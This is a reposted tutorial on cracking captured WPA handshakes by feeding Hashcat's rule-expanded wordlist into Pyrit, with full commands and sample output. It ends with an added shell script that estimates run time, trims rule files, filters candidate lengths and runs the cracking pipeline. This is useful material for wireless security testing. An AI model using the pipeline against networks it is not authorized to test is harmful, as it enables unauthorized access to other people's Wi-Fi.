Using dictionary rules with Pyrit & Hashcat (by d3ad0ne via ob-security.info)

Pyrit is one of the fastest WPA crackers available. It supports OpenCL and CUDA, and has SSE2-accelerated CPU cores as well. Even so, an extremely fast system only reaches about 100k keys (PMKs) per second, which makes brute forcing a WPA key pointless for full-character-set passwords longer than about five characters: 95^6 is roughly 7.4 x 10^11 candidates, or about 85 days at that rate. That leaves a dictionary attack as the only effective method. Personally I'm all for having a lot of dictionary files, but there comes a point when even a massive dictionary collection can't recover those hard-to-find WPA keys. This is where Hashcat comes in: release 0.35 adds an option to write the mangled (rule-expanded) words to standard output, and since Pyrit accepts a wordlist on stdin we can simply pipe Hashcat's output into Pyrit. To get started we need a hash file containing a single hash that can never be cracked, so that Hashcat never stops at a match and keeps emitting every candidate for the whole wordlist and rule set.

# echo ffffffffffffffff > nofind.hash

We set the Hashcat mode to -m 200 (the old, pre-4.1 MySQL hash) because it is one of the fastest modes and runs fine with a small number of threads. That hash masks each of its two 32-bit halves to 31 bits, so a digest such as ffffffffffffffff, with the top bit set in both halves, cannot be produced by any input and Hashcat will never find a "match" and exit early. To see what the pipeline will feed Pyrit, first run Hashcat on its own without piping its output anywhere:

# ./hashcat-cli64.bin -m 200 -r rules/best64.rule --debug-mode=3 nofind.hash dictionary.dic
Ctrl+C to stop

Something to consider: every rule in the rule file produces one candidate per dictionary word, so the number of candidates Hashcat emits is the dictionary size multiplied by the number of rules. A dictionary of 1,000 words run with 64 rules expands to 64,000 candidates. If your dictionary normally takes 20 minutes to complete, 64 rules make the run 64 times longer, a little over 21 hours (1,280 minutes). Hashcat 0.35 ships a rule file called best64.rule in the rules folder. Since best64.rule is ordered with the most productive rules first, you can make a shorter rule file by keeping only the top of it (make sure the lines you keep are actual rules and not comment or blank lines, which a rule file may contain).

# head -n 10 rules/best64.rule > rules/best10.rule

Now to add it all together..

# ./hashcat-cli64.bin -m 200 -n 2 -r rules/best10.rule --debug-mode=3 nofind.hash dictionary.dic | pyrit -r wpa_test.cap -i - attack_passthrough

If you’ve done everything correctly you should see something like…

Pyrit 0.3.1-dev (svn r283) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file '/wpa_test.cap' (1/1)...
Parsed 5 packets (5 802.11-packets), got 1 AP(s)

Picked AccessPoint 00:0d:ea:d0:01:00 ('test') automatically.
Tried 3840192 PMKs so far; 106871 PMKs per second.

Hopefully if all goes well you will see this –

The password is 'Passw0rd'.

For the Hashcat v0.35 switches used above: -m 200 selects the MySQL mode, and -n 2 limits Hashcat to 2 threads instead of the default 8, leaving the remaining CPU cores for Pyrit's PMK computation, which is the expensive part of the pipeline. -r sets the rule file, and --debug-mode=3 is what actually writes the mangled words to stdout. Note that the rate that matters is the one Pyrit reports (PMKs per second); Hashcat only has to generate candidates faster than Pyrit can consume them, which is why it can be starved of threads without slowing the attack.
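The following POSIX shell script is an added example and is not code from the original post or from the Hashcat or Pyrit projects. It wraps the procedure above, assuming the post's layout (hashcat-cli64.bin in the current directory, pyrit on PATH, nofind.hash already written); the function names, the constructed demo wordlist and the constructed rule file are mine. It counts only real rule lines (comment and blank lines are not rules, but wc -l counts them and head -n keeps them), computes the candidate count and a run-time estimate at a given PMK rate, writes the trimmed rule file, and, going one step beyond the post, drops candidates outside the 8 to 63 character range that a WPA-PSK passphrase must fall in before they reach Pyrit.

```shell
#!/bin/sh
# Added example, not code from the original post or the Hashcat/Pyrit projects.
# Assumes the post's layout: hashcat-cli64.bin in the current directory, pyrit
# on PATH, nofind.hash already created. Function names, the demo wordlist and
# the demo rule file are constructed for illustration.

# Count real rules: blank lines and '#' comments are not rules, but
# "wc -l" counts them and "head -n" keeps them.
count_rules() {
    grep -cv -e '^[[:space:]]*#' -e '^[[:space:]]*$' "$1"
}

# Count dictionary words (one per line; the last line may lack a newline).
count_words() {
    grep -c '' "$1"
}

# Hashcat emits one candidate per word per rule, so candidates = words * rules.
candidate_count() {   # candidate_count DICT RULEFILE
    echo $(( $(count_words "$1") * $(count_rules "$2") ))
}

# Whole seconds needed to test CANDIDATES at RATE PMKs per second; the rate
# is the one Pyrit prints (e.g. 106871 in the run above), not Hashcat's.
estimate_seconds() {  # estimate_seconds CANDIDATES RATE
    echo $(( $1 / $2 ))
}

fmt_hms() {           # fmt_hms SECONDS  -> e.g. "21h 20m 0s"
    printf '%dh %dm %ds\n' $(( $1 / 3600 )) $(( $1 % 3600 / 60 )) $(( $1 % 60 ))
}

# Keep the first N real rules of SRC in DST, so the top-N cut is not spent
# on header comments.
trim_rules() {        # trim_rules SRC N DST
    grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' "$1" | head -n "$2" > "$3"
}

# WPA-PSK passphrases are 8 to 63 characters; mangled candidates outside that
# range can never be the key, so drop them before Pyrit computes a PMK.
filter_wpa_candidates() {
    awk 'length($0) >= 8 && length($0) <= 63'
}

# The post's pipeline with the trimmed rules and the length filter inserted.
run_attack() {        # run_attack DICT RULEFILE CAPTURE
    ./hashcat-cli64.bin -m 200 -n 2 -r "$2" --debug-mode=3 nofind.hash "$1" \
        | filter_wpa_candidates \
        | pyrit -r "$3" -i - attack_passthrough
}

# --- demo on constructed inputs: 1000 words, and 64 single-character append
# --- rules ("$0" .. "$o") behind a comment line and a blank line.
demo=$(mktemp -d)
awk 'BEGIN { for (i = 1; i <= 1000; i++) print "word" i }' > "$demo/dictionary.dic"
{
    echo '# constructed rule file, not best64.rule'
    echo
    awk 'BEGIN { for (i = 0; i < 64; i++) printf "$%c\n", 48 + i }'
} > "$demo/rules.rule"

cands=$(candidate_count "$demo/dictionary.dic" "$demo/rules.rule")
echo "$(count_words "$demo/dictionary.dic") words x $(count_rules "$demo/rules.rule") rules = $cands candidates"
echo "wc -l would report $(wc -l < "$demo/rules.rule") lines for the rule file"
echo "at 100000 PMK/s: $(fmt_hms "$(estimate_seconds "$cands" 100000)")"
echo "20 min x 64 rules: $(fmt_hms $(( 20 * 60 * 64 )))"

trim_rules "$demo/rules.rule" 10 "$demo/best10.rule"
echo "best10.rule holds $(count_rules "$demo/best10.rule") rules"
printf 'pass\nPassw0rd\n' | filter_wpa_candidates   # only Passw0rd survives
rm -rf "$demo"

# Run the real attack only where the tools are actually present.
if [ -x ./hashcat-cli64.bin ] && command -v pyrit >/dev/null 2>&1; then
    run_attack dictionary.dic rules/best10.rule wpa_test.cap
fi
```

Two things the numbers do not show: words times rules is an upper bound on distinct candidates, since real rule files contain rules that coincide on some words (a no-op rule and a lowercasing rule give the same result on a word that is already lowercase), and the length filter is cheap insurance rather than a speed-up you can count on, because a rule set applied to short dictionary words produces many candidates under 8 characters that would otherwise cost a PMK each.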

Hashcat can be downloaded at hashcat.net

Original article: http://ob-security.info/?p=18
